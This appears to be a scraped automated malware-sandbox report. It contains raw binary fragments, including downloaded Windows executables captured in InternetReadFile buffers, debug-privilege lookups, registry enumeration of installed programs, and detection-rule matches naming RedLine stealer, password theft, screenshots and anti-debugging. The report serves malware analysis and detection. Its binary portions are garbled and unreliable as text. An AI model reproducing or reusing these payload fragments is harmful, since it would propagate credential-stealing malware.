~€{#:ÿÿÿ& 8’ÿÿÿ(} 8|ÿÿÿ|( *0/( }}|(+|( *0Î þ8þ E–oD8‘}  8Ðÿÿÿ| (+ ~€{G:®ÿÿÿ& 8£ÿÿÿ(}  ~€{j:ƒÿÿÿ& 8xÿÿÿ}  ~€{R:\ÿÿÿ& 8Qÿÿÿ| ( *0z þ8þ E108,(o  ~€{ƒ:Êÿÿÿ& 8¿ÿÿÿ*( ~€{0:£ÿÿÿ& 8˜ÿÿÿ0O þ8þ E/8*(@} ~€{+:Ïÿÿÿ& 8Äÿÿÿ*0i þ8þ EI8DÐ'({r%p((+(& ~€{K:µÿÿÿ& 8ªÿÿÿ*05 þ8þ EÐã/Ñ8Ë| (& ~€{/9Ãÿÿÿ& 8¸ÿÿÿ& ~€{c9& 8þ E%Ü8 ~€{d:Õÿÿÿ& 8Êÿÿÿ:ò 8þ EWSÜŒ µ2^HDiñ°~í͏8R(& 8”ÿÿÿ{X} ~€{z:rÿÿÿ& 8gÿÿÿ8¤ 8Xÿÿÿ }  þ8>ÿÿÿ:° ~€{E9& 8þ E0œ«jŒLFcyҋö8+|þ  ~€{H9šÿÿÿ& 8ÿÿÿ (' 9' 8yÿÿÿ8Ì ~€{x:`ÿÿÿ& 8Uÿÿÿ8 8Fÿÿÿ } 84ÿÿÿ ( 8#ÿÿÿ8 8ÿÿÿ{ ~€{V9øþÿÿ& 8íþÿÿÝ- ~€{>9Ôþÿÿ& 8Éþÿÿ%}  ~€{w:«þÿÿ& 8 þÿÿ|  (+ ~€{I9~þÿÿ& 8sþÿÿ (%=3 8\þÿÿ%}  ~€{(:>þÿÿ& 83þÿÿs{ u(&%('~%98&~þ s) %€(+(+}þs, ((() ~€{C:³ýÿÿ& 8¨ýÿÿÝ&ýÿÿ& ~€{X:& 8þ E8Ýïüÿÿ 8yüÿÿ(!("& ~€{?:Xüÿÿ& 8Müÿÿ ~€{g98üÿÿ& 8-üÿÿ} 8üÿÿ( ~€{(9üÿÿ& 8öûÿÿ Ž9uÿÿÿ ~€{L:Úûÿÿ& 8Ïûÿÿ}  8¾ûÿÿ{ {£& 8¡ûÿÿ(  8Žûÿÿ(:áÿÿÿ ~€{y9nûÿÿ& 8cûÿÿ8c 8Tûÿÿ(!(- (#($ ~€{`:*ûÿÿ& 8ûÿÿ8Âûÿÿ ~€{=:ûÿÿ& 8ûúÿÿ{{ Ži<ÿÿÿ 8Þúÿÿ8Œþÿÿ ~€{z:Åúÿÿ& 8ºúÿÿÝV& ~€{{9& 8þ E8Ý ~€{$:úÿÿ& 8úÿÿݛ ~€{l:& 8þ EC8| (. 8Óÿÿÿþ}  ~€{c:·ÿÿÿ& 8¬ÿÿÿÝ 8ùÿÿ*{  8ùÿÿþ}  ~€{G9èøÿÿ& 8ÝøÿÿALŒ‡7¸`7[s~+0P þ8þ E08+| (/ ~€{W:Îÿÿÿ& 8Ãÿÿÿ*0V þ8þ EèRÿ,8ãþ} ~€{>:Âÿÿÿ& 8·ÿÿÿ} ~€
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $‘¶Õ×tOÕ×tOÕ×tOŽ¿pNÇ×tOŽ¿wNÞ×tOŽ¿qNe×tOºqN×tOºpNÚ×tOºwNÜ×tOŽ¿uNØ×tOÕ×uO×tON¹}NÑ×tON¹tNÔ×tON¹‹OÔ×tON¹vNÔ×tORichÕ×tOPEd†’ /eð" rê˜ €À`%Xh%ŒøÐØ¢ MpNà.textÈpr `.rdataº©ªv@@.data €@> @À.pdataآФ^@@_RDATA”€@@.rsrcø@@.reloc @BHƒì(A¸ H''H [è“ H JHƒÄ(éÿ ÌÌÌHƒì(A¸ H'H °_èc H LJHƒÄ(éÏ ÌÌÌHƒì(A¸H'H ``è3 H ŒJHƒÄ(éŸ ÌÌÌHƒì(A¸ Hï&H p[è H ÌJHƒÄ(éo ÌÌÌHƒì(A¸Hç&H à^èÓ~ H KHƒÄ(é? ÌÌÌHƒì(A¸HÏ&H Yè£~ H LKHƒÄ(é ÌÌÌHƒì(E3ÀH¢ˆH c_èv~ H KHƒÄ(éâ ÌÌÌÌÌÌHƒì(E3ÀHrˆH “_èF~ H ÏKHƒÄ(é² ÌÌÌÌÌÌHƒì(E3ÀHBˆH £Zè~ H LHƒÄ(é‚ ÌÌÌÌÌÌHƒì(E3ÀHˆH “Xèæ} H OLHƒÄ(éR ÌÌÌÌÌÌHƒì(A¸Hÿ%H àXè³} H ŒLHƒÄ(é ÌÌÌHƒì(A¸Hß%H °`èƒ} H ÌLHƒÄ(éï ÌÌÌHƒì(A¸H¿%H ^èS} H MHƒÄ(é¿ ÌÌÌHƒì(A¸HŸ%H pWè#} H LMHƒÄ(é ÌÌÌHƒì(A¸H%H Yèó| H ŒMHƒÄ(é_ ÌÌÌHƒì(A¸ Ho%H [èÃ| H ÌMHƒÄ(é/ ÌÌÌHƒì(A¸HO%H [è“| H NHƒÄ(éÿ ÌÌÌHƒì(A¸H+%H pYèc| H LNHƒÄ(éÏ ÌÌÌHƒì(A¸H%H @Zè3| H ŒNHƒÄ(éŸ ÌÌÌHƒì(A¸Hï$H ð[è| H ÌNHƒÄ(éo ÌÌÌHƒì(A¸ HÏ$H  \èÓ{ H OHƒÄ(é? ÌÌÌHƒì(A¸LH¯$H ÐXè£{ H LOHƒÄ(é ÌÌÌHƒì(A¸HÏ$H Vès{ H ŒOHƒÄ(éß ÌÌÌHƒì(A¸dH¿$H 0^èC{ H ÌOHƒÄ(é¯ ÌÌÌHƒì(A¸H÷$H €\è{ H PHƒÄ(é ÌÌÌHƒì(A¸Hß$H PZèãz H LPHƒÄ(éO ÌÌÌHƒì(A¸ HÏ$H €Uè³z H ŒPHƒÄ(é ÌÌÌHƒì(A¸ H¯$H ðZèƒz H ÌPHƒÄ(éïÿ ÌÌÌHƒì(A¸(H$H `YèSz H QHƒÄ(é¿ÿ ÌÌÌHƒì(A¸ H$H \è#z H LQHƒÄ(éÿ ÌÌÌHƒì(A¸ Ho$H ^èóy H ŒQHƒÄ(é_ÿ ÌÌÌHƒì(A¸HO$H PZèÃy H ÌQHƒÄ(é/ÿ ÌÌÌHƒì(A¸H/$H À[è“y H RHƒÄ(éÿþ ÌÌÌHƒì(A¸ H$H Wècy H LRHƒÄ(éÏþ ÌÌÌHƒì(A¸,Hÿ#H ÀWè3y H ŒRHƒÄ(éŸþ ÌÌÌHƒì(A¸Hÿ#H ÐVèy H ÌRHƒÄ(éoþ ÌÌÌHƒì(A¸ Hï#H €ZèÓx H SHƒÄ(é?þ ÌÌÌHƒì(A¸$HÏ#H ðZè£x H LSHƒÄ(éþ ÌÌÌHƒì(A¸HÇ#H  Wèsx H ŒSHƒÄ(éßý ÌÌÌHƒì(A¸H¯#H pRèCx H ÌSHƒÄ(é¯ý ÌÌÌHƒì(A¸HŸ#H àWèx H THƒÄ(éý ÌÌÌHƒì(A¸ H#H ÐTèãw H LTHƒÄ(éOý ÌÌÌHƒì(A¸ Ho#H ÀXè³w H ŒTHƒÄ(éý ÌÌÌHƒì(A¸ Hg#H °Uèƒw H ÌTHƒÄ(éïü ÌÌÌHƒì(A¸ Hÿ"H àRèSw H UHƒÄ(é¿ü ÌÌÌHƒì(A¸H/#H Uè#w H LUHƒÄ(éü ÌÌÌHƒì(A¸H#H @Rèóv H ŒUHƒÄ(é_ü ÌÌÌHƒì(A¸ H÷"H PYèÃv H ÌUHƒÄ(é/ü ÌÌÌHƒì(A¸LHŸH @Uè“v H VHƒÄ(éÿû ÌÌÌHƒì(A¸H§"H 0Uècv H LVHƒÄ(éÏû ÌÌÌHƒì(A¸dH¯H àUè3v H ŒVHƒÄ(éŸû ÌÌÌHƒì(A¸HW"H Yèv H ÌVHƒÄ(éoû ÌÌÌHƒì(A¸H?"H àWèÓu H WHƒÄ(é?û ÌÌÌHƒì(A¸ H'"H ðTè£u H LWHƒÄ(éû ÌÌÌHƒì(A¸H"H Rèsu H ŒWHƒÄ(éßú ÌÌÌHƒì(A¸Hß!H ðXèCu H ÌWHƒÄ(é¯ú ÌÌÌHƒì(A¸H·!H Tèu H XHƒÄ(éú ÌÌÌHƒì(A¸H!H pRèãt H LXHƒÄ(éOú ÌÌÌHƒì(A¸Ho!H  Pè³t H ŒXHƒÄ(éú ÌÌÌHƒì(A¸HO!H Nèƒt H ÌXHƒÄ(éïù ÌÌÌHƒì(A¸ H?!H €TèSt H YHƒÄ(é¿ù ÌÌÌHƒì(A¸0H!H pWè#t H LYHƒÄ(éù ÌÌÌHƒì(A¸ H'!H `Wèós H ŒYHƒÄ(é_ù ÌÌÌHƒì(A¸H!H ðWèÃs H ÌYHƒÄ(é/ù ÌÌÌ
request_handle: 0x00cc0018
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³c—jàc—jàc—jà8ÿiái—jà8ÿoáë—jà8ÿnáq—jà¶únál—jà¶úiár—jà¶úoáB—jà8ÿkád—jàc—kà—jàøùcá`—jàøùjáb—jàøù•àb—jàøùháb—jàRichc—jàPEL” /eà! ’Ðf à@@zœÜzP°øÀÜÀnp0o@ H.text  `.rdata@b d@@.data v@À.rsrcø°‚@@.relocÜÀ„@Bj hèl¹p˜èOHh°è\SYÃÌÌÌj h m¹ˆ˜è/Hhè<SYÃÌÌÌjh0m¹ ˜èHhpèSYÃÌÌÌjhHm¹¸˜èïGhÐèüRYÃÌÌÌjhem¹Ð˜èÏGh0èÜRYÃÌÌÌjhem¹è˜è¯Ghè¼RYÃÌÌÌjhem¹™èGhðèœRYÃÌÌÌjhem¹™èoGhPè|RYÃÌÌÌh°èmRYÃÌÌÌÌhè]RYÃÌÌÌÌhpèMRYÃÌÌÌÌj?hðm¹x™èGhÐè,RYÃÌÌÌh°èRYÃÌÌÌÌhPè RYÃÌÌÌÌhðèýQYÃÌÌÌÌhèíQYÃÌÌÌÌh0èÝQYÃÌÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇÔ!f֋EƒÀPè[ƒÄ‹Æ^]ÂÌÌ̋I¸¼l…ÉEÁÃÌÌU‹ìV‹ñFÇÔ!PèC[ƒÄöEt j VèûMƒÄ‹Æ^]AÇÔ!Pè[YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇAÐlÇ,"ÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿh(zEôPèëZÌÌÌÌU‹ìV‹ñWÀFPÇÔ!f֋EƒÀPèBZƒÄÇ,"‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇÔ!f֋EƒÀPèZƒÄÇà!‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìì„ƒ}SV‹ÙW‰]à„Ûƒ}0„у}H„Çj/hhmMÈÇEôÇEøÆEäÇEØÇEÜÆEÈèþDjjjjh˜mÿ,!ƒ}MjCMjjjjjPQP‰E´ÿ0!ƒ}4M jCM jjjjQhœmP‰E¸ÿ4!ƒ}LU8ÿuHCU8Mȃ}Ü‹ðRÿuØCMÈQV‰uÀÿ8!EüPhÿ…€ûÿÿPVÿ<!…À„iƒ}ü„\…€ûÿÿÇE”ÇE˜PÆE„fDŠ@„Éuù+M„P…€ûÿÿPèD‹MüE„9M”ÇE¬BM”ƒ}˜QCE„MœPÇE°ÆEœèæCƒ}°Uœ‹}œ‹MôC׋Eø‹]¬+Á‰MÄSR;Øw,ƒ}øuä Cuä‰EôPè[j‹Mč3‹uÀƒÄ ÆëÆE¼Mäÿu¼SèIG‹}œ‹E°ƒør+H‹Çùr‹üƒÁ#+ǃÀüƒø‡˜QWèKƒÄ‹U˜ƒúr,‹M„B‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡dRQèÓJƒÄ‹EüƄ€ûÿÿEüPhÿ…€ûÿÿPVÿ<!…À…šþÿÿ‹]àV‹5@!ÿÖÿu¸ÿÖÿu´ÿÖEä‹UܸÆEäó~EôfÖCÇEô‰Eøƒúr/‹MÈB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡ÌRQè;J‹EøƒÄÇEØÇEÜÆEȃør.‹MäP‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡„RQèóIƒÄ‹UÇEôÇEøÆEäƒúr,‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡>RQè­IƒÄ‹U4ÇEÇEÆEƒúr,‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡øRQègIƒÄ‹ULÇE0ÇE4ÆE ƒú‚Ç‹M8B‹Áú‚«‹IüƒÂ#+ÁƒÀüƒø‡ªé’jhemÇCÇCÆèMA‹Uƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwbRQèÑHƒÄ‹U4ÇEÇEÆEƒú‚Lÿÿÿ‹M B‹Áú‚0ÿÿÿ‹IüƒÂ#+ÁƒÀüƒøwéÿÿÿRQè‚HƒÄ_^‹Ã[‹å]Ãè nÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì<¹`™SVW‹=@™3öVhem3Ûè@…ÿ„–DCOãÿ€yKËÿÿÿCŠ‹ð¥¶Ñòæÿ€yNÎÿÿÿF¶†ð¥ˆƒð¥ˆŽð¥Mඃð¥‰uø¶ÀjÇEðÇEô¶€ð¥ˆEÿEÿPÆEàè@Eàº`™PMÈèvA‹ðƒÄþ`™t|‹ t™ƒùr.¡`™Aùr‹PüƒÁ#+ƒÀüƒø‡Ô‹ÂQPèdGƒÄÇp™Çt™Æ`™`™ó~FfÖp™ÇFÇFÆ‹U܃úr(‹MÈB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw_RQèñFƒÄ‹UôÇEØÇEÜÆEȃúr(‹MàB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQè¯FƒÄ…ÿt‹uøéoþÿÿ_^[‹å]ÃèÃlÌÌÌU‹ìƒì<SVW‹ùÇGÇGÆèþÿÿ¡t™¾`™‹`™ƒø»0™Còƒ=D™C0™+މ]øƒø¹`™¡p™CÊÁ;ð„*Š3Mà2ˆEÿEÿjPÇEðÇEôÆEàèN>Eà‹×PMÈèÀ?‹ØƒÄ;ûte‹Oƒùr+‹Aùr‹PüƒÁ#+ƒÀüƒø‡Í‹ÂQPè¸EƒÄÇGÇGÆó~CfÖGÇCÇCÆ‹U܃úr(‹MÈB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwiRQèVEƒÄ‹UôÇEØÇEÜÆEȃúr(‹MàB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw'RQèEƒÄ¡t™F‹`™‹]øé¼þÿÿ‹Ç_^[‹å]ÃèkÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQƒ}4E SCE VWÿu0‰Mü¹H™Pè =ƒ}EÿuCE¹0™Pèô<‹5X™3ۋ=\™fDƒÿˆ›ð¥‹Ã¹H™C H™™÷þŠ ˆƒð¤Cû|Ô3ÿ3öŠ–𥶆ð¤ø¶Êùçÿ€yOÏÿÿÿGŠ‡ð¥ˆ†ð¥Fˆ—ð¥þ|Á‹uü‹Îè‡ýÿÿ‹Uƒúr
request_handle: 0x00cc0018
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Take ScreenShot rule ScreenShot
description PWS Memory rule Generic_PWS_Memory_Zero
description RedLine stealer rule RedLine_Stealer_m_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description PWS Memory rule Generic_PWS_Memory_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000458
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: AddressBook
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: Connection Manager
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: DirectDrawEx
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: EditPlus
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: ENTERPRISE
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: Fontcore
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: Google Chrome
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: Haansoft HWord 80 Korean
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: IE40
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: IE4Data
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

regkey_r: IE5BAKEX
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

regkey_r: IEData
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

regkey_r: MobileOptionPack
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

regkey_r: SchedulingAgent
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

regkey_r: WIC
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001F-0409-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001F-0412-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0028-0412-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-002C-0412-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0030-0000-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0044-0412-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-006E-0409-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-006E-0412-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-00A1-0412-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0114-0412-0000-0000000FF1CE}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d}
base_handle: 0x00000458
key_handle: 0x0000045c
options: 0
access: 0x00020019
